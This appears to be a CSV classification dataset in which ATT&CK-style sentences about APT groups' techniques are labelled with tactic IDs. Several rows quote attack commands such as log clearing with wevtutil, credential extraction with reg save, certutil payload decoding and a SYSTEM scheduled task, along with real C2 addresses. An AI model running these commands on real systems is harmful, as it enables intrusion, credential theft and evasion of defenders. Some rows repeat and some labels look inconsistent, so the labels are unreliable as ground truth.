APT-C-36 has prompted victims to accept macros in order to execute the subsequent payload.,['TA0002:Execution']
APT-C-36 has disguised its scheduled tasks as those used by Google.,['TA0005:Defense Evasion']
APT-C-36 has used port 4050 for C2 communications.,['TA0011:Command and Control']
"APT-C-36 has used ConfuserEx to obfuscate its variant of Imminent Monitor, compressed payload and RAT packages, and password protected encrypted email attachments to avoid detection.",['TA0005:Defense Evasion']
"APT-C-36 has used a macro function to set scheduled tasks, disguised as those used by Google.","['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
APT-C-36 has used spearphishing emails with password protected RAR attachment to avoid being detected by the email gateway.,['TA0001:Initial Access']
APT-C-36 obtained and used a modified variant of Imminent Monitor.,['TA0042:Resource Development']
APT-C-36 has embedded a VBScript within a malicious Word document which is executed upon the document opening.,['TA0002:Execution']
APT1 has used RAR to compress files before moving them outside of the victim network.,['TA0009:Collection']
APT1 used a batch script to perform a series of discovery techniques and saves it to a text file.,['TA0009:Collection']
APT1 has collected files from a local victim.,['TA0009:Collection']
APT1 has registered hundreds of domains for use in operations.,['TA0042:Resource Development']
APT1 hijacked FQDNs associated with legitimate websites hosted by hop points.,['TA0042:Resource Development']
"APT1 has created email accounts for later use in social engineering, phishing, and when registering domains.",['TA0042:Resource Development']
APT1 has been known to use credential dumping using Mimikatz.,['TA0006:Credential Access']
"APT1 used the commands net localgroup,net user, and net group to find accounts on the system.",['TA0007:Discovery']
"APT1 uses two utilities, GETMAIL and MAPIGET, to steal email. GETMAIL extracts emails from archived Outlook .pst files.",['TA0009:Collection']
APT1 used publicly available malware for privilege escalation.,['TA0042:Resource Development']
"The file name AcroRD32.exe, a legitimate process name for Adobe's Acrobat Reader, was used by APT1 as a name for malware.",['TA0005:Defense Evasion']
APT1 listed connected network shares.,['TA0007:Discovery']
The APT1 group is known to have used pass the hash.,"['TA0005:Defense Evasion', 'TA0008:Lateral Movement']"
APT1 gathered a list of running processes on the system using tasklist /v.,['TA0007:Discovery']
The APT1 group is known to have used RDP during operations.,['TA0008:Lateral Movement']
"APT1 uses two utilities, GETMAIL and MAPIGET, to steal email. MAPIGET steals email still on Exchange servers that has not yet been archived.",['TA0009:Collection']
APT1 has sent spearphishing emails containing malicious attachments.,['TA0001:Initial Access']
APT1 has sent spearphishing emails containing hyperlinks to malicious files.,['TA0001:Initial Access']
APT1 used the ipconfig /all command to gather network configuration information.,['TA0007:Discovery']
APT1 used the net use command to get a listing on network connections.,['TA0007:Discovery']
APT1 used the commands net start and tasklist to get a listing of the services on the system.,['TA0007:Discovery']
APT1 has used various open-source tools for privilege escalation purposes.,['TA0042:Resource Development']
"APT1 has used the Windows command shell to execute commands, and batch scripting to automate execution.",['TA0002:Execution']
APT12 has used blogs and WordPress for C2 infrastructure.,['TA0011:Command and Control']
APT12 has used multiple variants of DNS Calculation including multiplying the first two octets of an IP address and adding the third octet to that value in order to get a resulting command and control port.,['TA0011:Command and Control']
"APT12 has exploited multiple vulnerabilities for execution, including Microsoft Office vulnerabilities and vulnerabilities in Adobe Reader and Flash .",['TA0002:Execution']
APT12 has attempted to get victims to open malicious Microsoft Word and PDF attachment sent via spearphishing.,['TA0002:Execution']
APT12 has sent emails with malicious Microsoft Office documents and PDFs attached.,['TA0001:Initial Access']
APT16 has compromised otherwise legitimate sites as staging servers for second-stage payloads.,['TA0042:Resource Development']
"APT17 has created and cultivated profile pages in Microsoft TechNet. To make profile pages appear more legitimate, APT17 has created biographical sections and posted in forum threads.",['TA0042:Resource Development']
APT17 has created profile pages in Microsoft TechNet that were used as C2 infrastructure.,['TA0042:Resource Development']
APT18 actors used the native at Windows task scheduler tool to use scheduled tasks for execution on a victim network.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
APT18 uses DNS for C2 communications.,['TA0011:Command and Control']
APT18 obfuscates strings in the payload.,['TA0005:Defense Evasion']
APT18 actors leverage legitimate credentials to log into external remote services.,"['TA0001:Initial Access', 'TA0003:Persistence']"
APT18 actors deleted tools and batch files from victim systems.,['TA0005:Defense Evasion']
APT18 can list files information for specific directories.,['TA0007:Discovery']
APT18 can upload a file to the victim’s machine.,['TA0011:Command and Control']
APT18 establishes persistence via the HKCU\Software\Microsoft\Windows\CurrentVersion\Run key.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
APT18 can collect system information from the victim’s machine.,['TA0007:Discovery']
APT18 actors leverage legitimate credentials to log into external remote services.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
APT18 uses HTTP for C2 communications.,['TA0011:Command and Control']
APT18 uses cmd.exe to execute commands on the victim’s machine.,['TA0002:Execution']
APT19 used Base64 to obfuscate executed commands.,['TA0005:Defense Evasion']
APT19 downloaded and launched code within a SCT file.,['TA0002:Execution']
APT19 launched an HTTP malware variant and a Port 22 malware variant using a legitimate executable that loaded the malicious DLL.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
An APT19 HTTP malware variant decrypts strings using single-byte XOR keys.,['TA0005:Defense Evasion']
APT19 performed a watering hole attack on forbes.com in 2014 to compromise targets.,['TA0001:Initial Access']
APT19 used Base64 to obfuscate payloads.,['TA0005:Defense Evasion']
APT19 used -W Hidden to conceal PowerShell windows by setting the WindowStyle parameter to hidden.,['TA0005:Defense Evasion']
APT19 attempted to get users to launch malicious attachments delivered via spearphishing emails.,['TA0002:Execution']
APT19 uses a Port 22 malware variant to modify several Registry keys.,['TA0005:Defense Evasion']
APT19 used PowerShell commands to execute payloads.,['TA0002:Execution']
An APT19 HTTP malware variant establishes persistence by setting the Registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Windows Debug Tools-%LOCALAPPDATA%\.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
APT19 used Regsvr32 to bypass application control techniques.,['TA0005:Defense Evasion']
APT19 configured its payload to inject into the rundll32.exe.,['TA0005:Defense Evasion']
APT19 sent spearphishing emails with malicious attachments in RTF and XLSM formats to deliver initial exploits.,['TA0001:Initial Access']
An APT19 HTTP malware variant used Base64 to encode communications to the C2 server.,['TA0011:Command and Control']
APT19 collected system architecture information. APT19 used an HTTP malware variant and a Port 22 malware variant to gather the hostname and CPU information from the victim’s machine.,['TA0007:Discovery']
APT19 used an HTTP malware variant and a Port 22 malware variant to collect the MAC address and IP address from the victim’s machine.,['TA0007:Discovery']
APT19 used an HTTP malware variant and a Port 22 malware variant to collect the victim’s username.,['TA0007:Discovery']
APT19 has obtained and used publicly-available tools like Empire.,['TA0042:Resource Development']
APT19 used HTTP for C2 communications. APT19 also used an HTTP malware variant to communicate over HTTP for C2.,['TA0011:Command and Control']
An APT19 Port 22 malware variant registers itself as a service.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
APT28 has used a Powershell cmdlet to grant the ApplicationImpersonation role to a compromised account.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
"APT28 has used several malicious applications that abused OAuth access tokens to gain access to target email accounts, including Gmail and Yahoo Mail.","['TA0005:Defense Evasion', 'TA0008:Lateral Movement']"
APT28 used a publicly available tool to gather and compress multiple documents on the DCCC and DNC networks.,['TA0009:Collection']
"APT28 has used a variety of utilities, including WinRAR, to archive collected data with password protection.",['TA0009:Collection']
APT28 used a publicly available tool to gather and compress multiple documents on the DCCC and DNC networks.,['TA0009:Collection']
APT28 has used Google Drive for C2.,['TA0011:Command and Control']
APT28 has deployed a bootkit along with Downdelph to ensure its persistence on the victim. The bootkit shares code with some variants of BlackEnergy.,"['TA0005:Defense Evasion', 'TA0003:Persistence']"
APT28 can perform brute force attacks to obtain credentials.,['TA0006:Credential Access']
"APT28 has cleared event logs, including by using the commands wevtutil cl System and wevtutil cl Security.",['TA0005:Defense Evasion']
APT28 has used compromised Office 365 service accounts with Global Administrator privileges to collect email from user inboxes.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
APT28 uses a tool that captures information from air-gapped computers via an infected USB and transfers it to network-connected computer when the USB is inserted.,['TA0011:Command and Control']
APT28 has used COM hijacking for persistence by replacing the legitimate MMDeviceEnumerator object with a payload.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
APT28 has harvested user's login credentials.,['TA0043:Reconnaissance']
APT28 has split archived exfiltration files into chunks smaller than 1MB.,['TA0010:Exfiltration']
APT28 has collected files from various information repositories.,['TA0009:Collection']
"APT28 has retrieved internal documents from machines inside victim environments, including by using Forfiles to stage documents before exfiltration.",['TA0009:Collection']
APT28 has collected files from network shared drives.,['TA0009:Collection']
An APT28 backdoor may collect the entire contents of an inserted USB device.,['TA0009:Collection']
An APT28 macro uses the command certutil -decode to decode contents of a .txt file storing the base64 encoded payload.,['TA0005:Defense Evasion']
"APT28 registered domains imitating NATO, OSCE security websites, Caucasus information resources, and other organizations.",['TA0042:Resource Development']
APT28 has compromised targets via strategic web compromise utilizing custom exploit kits. APT28 used reflected cross-site scripting against government websites to redirect users to phishing webpages.,['TA0001:Initial Access']
APT28 has delivered JHUHUGIT and Koadic by executing PowerShell commands through DDE in Word documents.,['TA0002:Execution']
APT28 has used compromised email accounts to send credential phishing emails.,['TA0042:Resource Development']
"APT28 encrypted a .dll payload using RTL and a custom encryption algorithm. APT28 has also obfuscated payloads with base64, XOR, and RC4.",['TA0005:Defense Evasion']
APT28 has used a Wi-Fi Pineapple to set up Evil Twin Wi-Fi Poisoning for the purposes of capturing victim credentials or planting espionage-oriented malware.,"['TA0009:Collection', 'TA0006:Credential Access']"
APT28 has exfiltrated archives of collected data previously staged on a target's OWA server via HTTPS.,['TA0010:Exfiltration']
APT28 can exfiltrate data over Google Drive.,['TA0010:Exfiltration']
"APT28 has used a variety of public exploits, including CVE 2020-0688 and CVE 2020-17144, to gain execution on vulnerable Microsoft Exchange; they have also conducted SQL injection attacks against external websites.",['TA0001:Initial Access']
APT28 has exploited Microsoft Office vulnerability CVE-2017-0262 for execution.,['TA0002:Execution']
APT28 has used CVE-2015-4902 to bypass security features.,['TA0005:Defense Evasion']
"APT28 has exploited CVE-2014-4076, CVE-2015-2387, CVE-2015-1701, CVE-2017-0263 to escalate privileges.",['TA0004:Privilege Escalation']
APT28 exploited a Windows SMB Remote Code Execution Vulnerability to conduct lateral movement.,['TA0008:Lateral Movement']
"APT28 used other victims as proxies to relay command traffic, for instance using a compromised Georgian military email server as a hop point to NATO victims. The group has also used a tool that acts as a proxy to allow C2 even if the victim is behind a router. APT28 has also used a machine to relay and obscure communications between CHOPSTICK and their server.",['TA0011:Command and Control']
APT28 has used Tor and a variety of commercial VPN services to route brute force authentication attempts.,"['TA0001:Initial Access', 'TA0003:Persistence']"
"APT28 has intentionally deleted computer files to cover their tracks, including with use of the program CCleaner.",['TA0005:Defense Evasion']
"APT28 has used Forfiles to locate PDF, Excel, and Word documents during collection. The group also searched a compromised DCCC computer for specific terms.",['TA0007:Discovery']
APT28 has saved files with hidden file attributes.,['TA0005:Defense Evasion']
APT28 has used the WindowStyle parameter to conceal PowerShell windows.,['TA0005:Defense Evasion']
"APT28 has downloaded additional files, including by using a first-stage downloader to contact the C2 server to obtain the second-stage implant.",['TA0011:Command and Control']
"APT28 added ""junk data"" to each encoded string, preventing trivial decoding without knowledge of the junk removal algorithm. Each implant was given a ""junk length"" value when created, tracked by the controller software to allow seamless communication but prevent analysis of the command protocol on the wire.",['TA0011:Command and Control']
APT28 has used tools to perform keylogging.,"['TA0009:Collection', 'TA0006:Credential Access']"
APT28 regularly deploys both publicly available ) and custom password retrieval tools on victims. They have also dumped the LSASS process memory using the MiniDump function.,['TA0006:Credential Access']
APT28 has stored captured credential information in a file named pi.log.,['TA0009:Collection']
An APT28 loader Trojan adds the Registry key HKCU\Environment\UserInitMprLogonScript to establish persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
"APT28 has used IMAP, POP3, and SMTP for a communication channel in various implants, including using self-registered Google Mail accounts and later compromised email servers of its victims.",['TA0011:Command and Control']
APT28 attempted to get users to click on Microsoft Office attachments containing malicious macro scripts.,['TA0002:Execution']
APT28 has tricked unwitting recipients into clicking on malicious hyperlinks within emails crafted to resemble trustworthy senders.,['TA0002:Execution']
APT28 has renamed the WinRAR utility to avoid detection.,['TA0005:Defense Evasion']
"APT28 has changed extensions on files containing exfiltrated data to make them appear benign, and renamed a web shell instance to appear as a legitimate OWA page.",['TA0005:Defense Evasion']
APT28 has routed traffic over Tor and VPN servers to obfuscate their activities.,['TA0011:Command and Control']
APT28 has used the ntdsutil.exe utility to export the Active Directory database for credential access.,['TA0006:Credential Access']
"In 2016, APT28 conducted a distributed denial of service attack against the World Anti-Doping Agency.",['TA0040:Impact']
APT28 compromised Ubiquiti network devices to act as collection devices for credentials compromised via phishing webpages.,['TA0042:Resource Development']
"APT28 deployed the open source tool Responder to conduct NetBIOS Name Service poisoning, which captured usernames and hashed passwords that allowed access to legitimate credentials. APT28 close-access teams have used Wi-Fi pineapples to intercept Wi-Fi signals and user credentials.","['TA0006:Credential Access', 'TA0007:Discovery']"
APT28 regularly deploys both publicly available ) and custom password retrieval tools on victims.,['TA0006:Credential Access']
APT28 has used the Office Test persistence mechanism within Microsoft Office by adding the Registry key HKCU\Software\Microsoft\Office test\Special\Perf to execute code.,['TA0003:Persistence']
APT28 has used pass the hash for lateral movement.,"['TA0005:Defense Evasion', 'TA0008:Lateral Movement']"
"APT28 has used a brute-force/password-spray tooling that operated in two modes: in brute-force mode it typically sent over 300 authentication attempts per hour per targeted account over the course of several hours or days. APT28 has also used a Kubernetes cluster to conduct distributed, large-scale password guessing attacks.",['TA0006:Credential Access']
"APT28 has used a brute-force/password-spray tooling that operated in two modes: in password-spraying mode it conducted approximately four authentication attempts per hour per targeted account over the course of several days or weeks. APT28 has also used a Kubernetes cluster to conduct distributed, large-scale password spray attacks.",['TA0006:Credential Access']
APT28 uses a module to receive a notification every time a USB mass storage device is inserted into a victim.,['TA0007:Discovery']
APT28 has used spearphishing to compromise credentials.,['TA0043:Reconnaissance']
APT28 downloads and executes PowerShell scripts and performs PowerShell commands.,['TA0002:Execution']
An APT28 loader Trojan will enumerate the victim's processes searching for explorer.exe if its current process does not have necessary permissions.,['TA0007:Discovery']
APT28 has deployed malware that has copied itself to the startup directory for persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
APT28 has staged archives of collected data on a target's Outlook Web Access server.,['TA0009:Collection']
APT28 has collected emails from victim Microsoft Exchange servers.,['TA0009:Collection']
APT28 uses a tool to infect connected USB devices and transmit itself to air-gapped computers when the infected USB device is inserted.,"['TA0001:Initial Access', 'TA0008:Lateral Movement']"
APT28 has used a UEFI rootkit known as LoJax.,['TA0005:Defense Evasion']
APT28 executed CHOPSTICK by using rundll32 commands such as rundll32.exe “C:\Windows\twain_64.dll”. APT28 also executed a .dll for a first stage dropper using rundll32.exe. An APT28 loader Trojan saved a batch script that uses rundll32 to execute a DLL payload.,['TA0005:Defense Evasion']
APT28 has mapped network drives using Net and administrator credentials.,['TA0008:Lateral Movement']
APT28 has used tools to take screenshots from victims.,['TA0009:Collection']
APT28 has collected information from Microsoft SharePoint services within target networks.,['TA0009:Collection']
APT28 sent spearphishing emails containing malicious Microsoft Office and RAR attachments.,['TA0001:Initial Access']
APT28 has conducted credential phishing campaigns with links that redirect to credential harvesting sites.,['TA0043:Reconnaissance']
"APT28 has used several malicious applications to steal user OAuth access tokens including applications masquerading as ""Google Defender"" ""Google Email Protection,"" and ""Google Scanner"" for Gmail users. They also targeted Yahoo users with applications masquerading as ""Delivery Service"" and ""McAfee Email Protection"".",['TA0006:Credential Access']
APT28 installed a Delphi backdoor that used a custom algorithm for C2 communications.,['TA0011:Command and Control']
APT28 used weaponized Microsoft Word documents abusing the remote template function to retrieve a malicious macro.,['TA0005:Defense Evasion']
APT28 has performed timestomping on victim files.,['TA0005:Defense Evasion']
APT28 has used CVE-2015-1701 to access the SYSTEM token and copy it into the current process as part of privilege escalation.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
"APT28 has obtained and used open-source tools like Koadic, Mimikatz, and Responder.",['TA0042:Resource Development']
"Once APT28 gained access to the DCCC network, the group then proceeded to use that access to compromise the DNC network.",['TA0001:Initial Access']
"APT28 has used legitimate credentials to gain initial access, maintain access, and exfiltrate data from a victim network. The group has specifically used credentials stolen through a spearphishing email to login to the DCCC network. The group has also leveraged default manufacturer's passwords to gain initial access to corporate networks via IoT devices such as a VOIP phone, printer, and video decoder.","['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
APT28 hosted phishing domains on free services for brief periods of time during campaigns.,['TA0042:Resource Development']
APT28 has performed large-scale scans in an attempt to find vulnerable servers.,['TA0043:Reconnaissance']
"Later implants used by APT28, such as CHOPSTICK, use a blend of HTTP, HTTPS, and other legitimate channels for C2, depending on module configuration.",['TA0011:Command and Control']
APT28 has used newly-created Blogspot pages for credential harvesting operations.,['TA0042:Resource Development']
APT28 has used a modified and obfuscated version of the reGeorg web shell to maintain persistence on a target's Outlook Web Access server.,['TA0003:Persistence']
An APT28 loader Trojan uses a cmd.exe and batch script to run its payload. The group has also used macros to execute payloads.,['TA0002:Execution']
"APT29 used sticky-keys to obtain unauthenticated, privileged console access.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
APT29 has used a compromised global administrator account in Azure AD to backdoor a service principal with `ApplicationImpersonation` rights to start collecting emails from targeted mailboxes; APT29 has also used compromised accounts holding `ApplicationImpersonation` rights in Exchange to collect emails.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
APT29 used large size files to avoid detection by security solutions with hardcoded size limits.,['TA0005:Defense Evasion']
APT29 has hijacked legitimate application-specific startup scripts to enable malware to execute on system startup.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
APT29 has bypassed UAC.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
APT29 has leveraged the Microsoft Graph API to perform various actions across Azure and M365 environments. They have also utilized AADInternals PowerShell Modules to access the API,['TA0002:Execution']
APT29 has conducted enumeration of Azure AD accounts.,['TA0007:Discovery']
APT29 can create new users through Azure AD.,['TA0003:Persistence']
"APT29 has used residential proxies, including Azure Virtual Machines, to obfuscate their access to victim environments.",['TA0042:Resource Development']
APT29 has gained access to a global administrator account in Azure AD and has used `Service Principal` credentials in Exchange.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
APT29 has used Azure Run Command and Azure Admin-on-Behalf-of to execute code on virtual machines.,['TA0002:Execution']
"APT29 has leveraged compromised high-privileged on-premises accounts synced to Office 365 to move laterally into a cloud environment, including through the use of Azure AD PowerShell.",['TA0008:Lateral Movement']
APT29 has stolen data from compromised hosts.,['TA0009:Collection']
"APT29 has enrolled their own devices into compromised cloud tenants, including enrolling a device in MFA to an Azure AD environment following a successful password guessing attack against a dormant account.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
APT29 has created self-signed digital certificates to enable mutual TLS authentication for malware.,['TA0042:Resource Development']
APT29 has disabled Purview Audit on targeted accounts prior to stealing emails from Microsoft 365 tenants.,['TA0005:Defense Evasion']
APT29 has used the meek domain fronting plugin for Tor to hide the destination of C2 traffic.,['TA0011:Command and Control']
APT29 has used Dynamic DNS providers for their malware C2 infrastructure.,['TA0011:Command and Control']
APT29 has compromised email accounts to further enable phishing campaigns and taken control of dormant accounts.,['TA0042:Resource Development']
APT29 has used multiple layers of encryption within malware to protect C2 communication.,['TA0011:Command and Control']
"APT29 has exploited CVE-2019-19781 for Citrix, CVE-2019-11510 for Pulse Secure VPNs, CVE-2018-13379 for FortiGate VPNs, and CVE-2019-9670 in Zimbra software to gain access.",['TA0001:Initial Access']
"APT29 has used multiple software exploits for common client software, like Microsoft Word, Exchange, and Adobe Reader, to gain code execution.",['TA0002:Execution']
APT29 has exploited CVE-2021-36934 to escalate privileges on a compromised host.,['TA0004:Privilege Escalation']
APT29 uses compromised residential endpoints as proxies for defense evasion and network access.,['TA0011:Command and Control']
APT29 has used compromised identities to access networks via VPNs and Citrix.,"['TA0001:Initial Access', 'TA0003:Persistence']"
APT29 has used SDelete to remove artifacts from victim networks.,['TA0005:Defense Evasion']
APT29 has embedded an ISO file within an HTML attachment that contained JavaScript code to initiate malware execution.,['TA0005:Defense Evasion']
"APT29 uses compromised residential endpoints, typically within the same ISP IP address range, as proxies to hide the true source of C2 traffic.",['TA0011:Command and Control']
"APT29 has edited the `Microsoft.IdentityServer.Servicehost.exe.config` file to load a malicious DLL into the AD FS process, thereby enabling persistent access to any service federated with AD FS for a user with a specified User Principal Name.","['TA0006:Credential Access', 'TA0005:Defense Evasion', 'TA0003:Persistence']"
APT29 has downloaded additional tools and malware onto compromised networks.,['TA0011:Command and Control']
APT29 has ensured web servers in a victim environment are Internet accessible before copying tools or malware to it.,['TA0007:Discovery']
APT29 has used the `reg save` command to extract LSA secrets offline.,['TA0006:Credential Access']
"APT29 targets dormant or inactive user accounts, accounts belonging to individuals no longer at the organization but whose accounts remain on the system, for access and persistence.","['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"APT29 has used various forms of spearphishing attempting to get a user to open attachments, including, but not limited to, malicious Microsoft Word documents, .pdf, and .lnk files.",['TA0002:Execution']
APT29 has used various forms of spearphishing attempting to get a user to click on a malicious link.,['TA0002:Execution']
APT29 has used unique malware in many of their operations.,['TA0042:Resource Development']
APT29 has embedded ISO images and VHDX files in HTML to evade Mark-of-the-Web.,['TA0005:Defense Evasion']
APT29 has renamed malicious DLLs with legitimate names to appear benign; they have also created an Azure AD certificate with a Common Name that matched the display name of the compromised service principal.,['TA0005:Defense Evasion']
APT29 has use `mshta` to execute malicious scripts on a compromised host.,['TA0005:Defense Evasion']
APT29 has used repeated MFA requests to gain access to victim accounts.,['TA0006:Credential Access']
"A backdoor used by APT29 created a Tor hidden service to forward traffic from the Tor client to local ports 3389 , 139 , and 445 enabling full remote access from outside the network and has also used TOR.",['TA0011:Command and Control']
APT29 used Kerberos ticket attacks for lateral movement.,"['TA0005:Defense Evasion', 'TA0008:Lateral Movement']"
APT29 has successfully conducted password guessing attacks against a list of mailboxes.,['TA0006:Credential Access']
APT29 has conducted brute force password spray attacks.,['TA0006:Credential Access']
APT29 has used encoded PowerShell scripts uploaded to CozyCar installations to download and install SeaDuke.,['TA0002:Execution']
APT29 has developed malware variants written in Python.,['TA0002:Execution']
APT29 has installed a run command on a compromised system to enable malware execution on system startup.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
APT29 added Registry Run keys to establish persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
"APT29 has collected emails from targeted mailboxes within a compromised Azure AD tenant and compromised Exchange servers, including via Exchange Web Services API requests.",['TA0009:Collection']
APT29 has used named and hijacked scheduled tasks to establish persistence.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
APT29 has used the `reg save` command to save registry hives.,['TA0006:Credential Access']
APT29 used UPX to pack files.,['TA0005:Defense Evasion']
APT29 has used spearphishing emails with an attachment to deliver files with exploits to initial victims.,['TA0001:Initial Access']
APT29 has used spearphishing with a link to trick victims into clicking on a link to a zip file containing malicious files.,['TA0001:Initial Access']
APT29 has used the legitimate mailing service Constant Contact to send phishing e-mails.,['TA0001:Initial Access']
"APT29 uses stolen tokens to access victim accounts, without needing a password.",['TA0006:Credential Access']
APT29 has abused misconfigured AD CS certificate templates to impersonate admin users and create additional authentication certificates.,['TA0006:Credential Access']
APT29 has used timestomping to alter the Standard Information timestamps on their web shells to match other files in the same directory.,['TA0005:Defense Evasion']
"APT29 has obtained and used a variety of tools including Mimikatz, SDelete, Tor, meek, and Cobalt Strike.",['TA0042:Resource Development']
"APT29 has compromised IT, cloud services, and managed services providers to gain broad access to multiple customers for subsequent operations.",['TA0001:Initial Access']
APT29 has used a compromised account to access an organization's VPN infrastructure.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
APT29 has conducted widespread scanning of target environments to identify vulnerabilities for exploit.,['TA0043:Reconnaissance']
"APT29 has registered algorithmically generated Twitter handles that are used for C2 by malware, such as HAMMERTOSS. APT29 has also used legitimate web services such as Dropbox and Constant Contact in their operations.",['TA0042:Resource Development']
APT29 has installed web shells on exploited Microsoft Exchange servers.,['TA0003:Persistence']
APT29 used WMI to steal credentials and execute backdoors at a future time.,['TA0002:Execution']
APT29 has used WMI event subscriptions for persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
APT3 replaces the Sticky Keys binary C:\Windows\System32\sethc.exe for persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
APT3 has been known to add created accounts to local admin groups to maintain elevated access.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
APT3 has used tools to compress data before exfilling it.,['TA0009:Collection']
APT3 has a tool that can locate credentials in files on the file system such as those from Firefox or Chrome.,['TA0006:Credential Access']
APT3 has used tools to dump passwords from browsers.,['TA0006:Credential Access']
APT3 has been known to side load DLLs with a valid version of Chrome with one of their tools.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
APT3 will identify Microsoft Office documents on the victim's computer.,['TA0009:Collection']
APT3 leverages valid accounts after gaining credentials for use within the victim domain.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
APT3 has a tool that exfiltrates data over the C2 channel.,['TA0010:Exfiltration']
APT3 has exploited the Adobe Flash Player vulnerability CVE-2015-3113 and Internet Explorer vulnerability CVE-2014-1776.,['TA0002:Execution']
An APT3 downloader establishes SOCKS5 connections for its initial C2.,['TA0011:Command and Control']
APT3 has a tool that can delete files.,['TA0005:Defense Evasion']
APT3 has a tool that looks for files and directories on the local file system.,['TA0007:Discovery']
APT3 has been known to use -WindowStyle Hidden to conceal PowerShell windows.,['TA0005:Defense Evasion']
APT3 has been known to remove indicators of compromise from tools.,['TA0005:Defense Evasion']
APT3 has a tool that can copy files to remote machines.,['TA0011:Command and Control']
APT3 has used a keylogging tool that records keystrokes in encrypted files.,"['TA0009:Collection', 'TA0006:Credential Access']"
"APT3 has used a tool to dump credentials by injecting itself into lsass.exe and triggering with the argument ""dig.""",['TA0006:Credential Access']
"APT3 has used a tool that can obtain info about local and global group users, power users, and administrators.",['TA0007:Discovery']
"APT3 has been known to create or enable accounts, such as support_388945a0.",['TA0003:Persistence']
APT3 has been known to stage files for exfiltration in a single location.,['TA0009:Collection']
APT3 has lured victims into clicking malicious links delivered through spearphishing.,['TA0002:Execution']
"APT3 has been known to create or enable accounts, such as support_388945a0.",['TA0005:Defense Evasion']
"An APT3 downloader first establishes a SOCKS5 connection to 192.157.198.103 using TCP port 1913; once the server response is verified, it then requests a connection to 192.184.60.229 on TCP port 81.",['TA0011:Command and Control']
An APT3 downloader establishes SOCKS5 connections for its initial C2.,['TA0011:Command and Control']
APT3 obfuscates files or information to help evade defensive measures.,['TA0005:Defense Evasion']
APT3 has been known to brute force password hashes to be able to leverage plain text credentials.,['TA0006:Credential Access']
APT3 has a tool that can enumerate the permissions associated with Windows groups.,['TA0007:Discovery']
APT3 has used PowerShell on victim systems to download and run payloads after exploitation.,['TA0002:Execution']
APT3 has a tool that can list out currently running processes.,['TA0007:Discovery']
APT3 places scripts in the startup folder for persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
APT3 enables the Remote Desktop Protocol for persistence. APT3 has also interacted with compromised systems to browse and copy files through RDP sessions.,['TA0008:Lateral Movement']
APT3 has a tool that can detect the existence of remote systems.,['TA0007:Discovery']
APT3 has a tool that can run DLLs.,['TA0005:Defense Evasion']
APT3 will copy files over to Windows Admin Shares as part of lateral movement.,['TA0008:Lateral Movement']
"An APT3 downloader creates persistence by creating the following scheduled task: schtasks /create /tn ""mysc"" /tr C:\Users\Public\test.exe /sc ONLOGON /ru ""System"".","['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
APT3 has been known to pack their tools.,['TA0005:Defense Evasion']
APT3 has sent spearphishing emails containing malicious links.,['TA0001:Initial Access']
APT3 has a tool that can obtain information about the local system.,['TA0007:Discovery']
"A keylogging tool used by APT3 gathers network information from the victim, including the MAC address, IP address, WINS, DHCP server, and gateway.",['TA0007:Discovery']
APT3 has a tool that can enumerate current network connections.,['TA0007:Discovery']
"An APT3 downloader uses the Windows command ""cmd.exe"" /C whoami to verify that it is running with the elevated privileges of “System.”",['TA0007:Discovery']
"An APT3 downloader uses the Windows command ""cmd.exe"" /C whoami. The group also uses a tool to execute commands on remote computers.",['TA0002:Execution']
APT3 has a tool that creates a new service for persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
APT30 has relied on users to execute malicious file attachments delivered via spearphishing emails.,['TA0002:Execution']
APT30 has used spearphishing emails with malicious DOC attachments.,['TA0001:Initial Access']
APT32's backdoor has used LZMA compression and RC4 encryption before exfiltration.,['TA0009:Collection']
APT32 includes garbage code to mislead anti-malware software and researchers.,['TA0005:Defense Evasion']
APT32 has cleared select event log entries.,['TA0005:Defense Evasion']
APT32 has used the `Invoke-Obfuscation` framework to obfuscate their PowerShell.,['TA0005:Defense Evasion']
APT32 has used COM scriptlets to download Cobalt Strike beacons.,['TA0002:Execution']
APT32 used Outlook Credential Dumper to harvest credentials stored in Windows registry.,['TA0006:Credential Access']
"APT32 ran legitimately-signed executables from Symantec and McAfee which load a malicious DLL. The group also side-loads its backdoor by dropping a library and a legitimate, signed executable .","['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
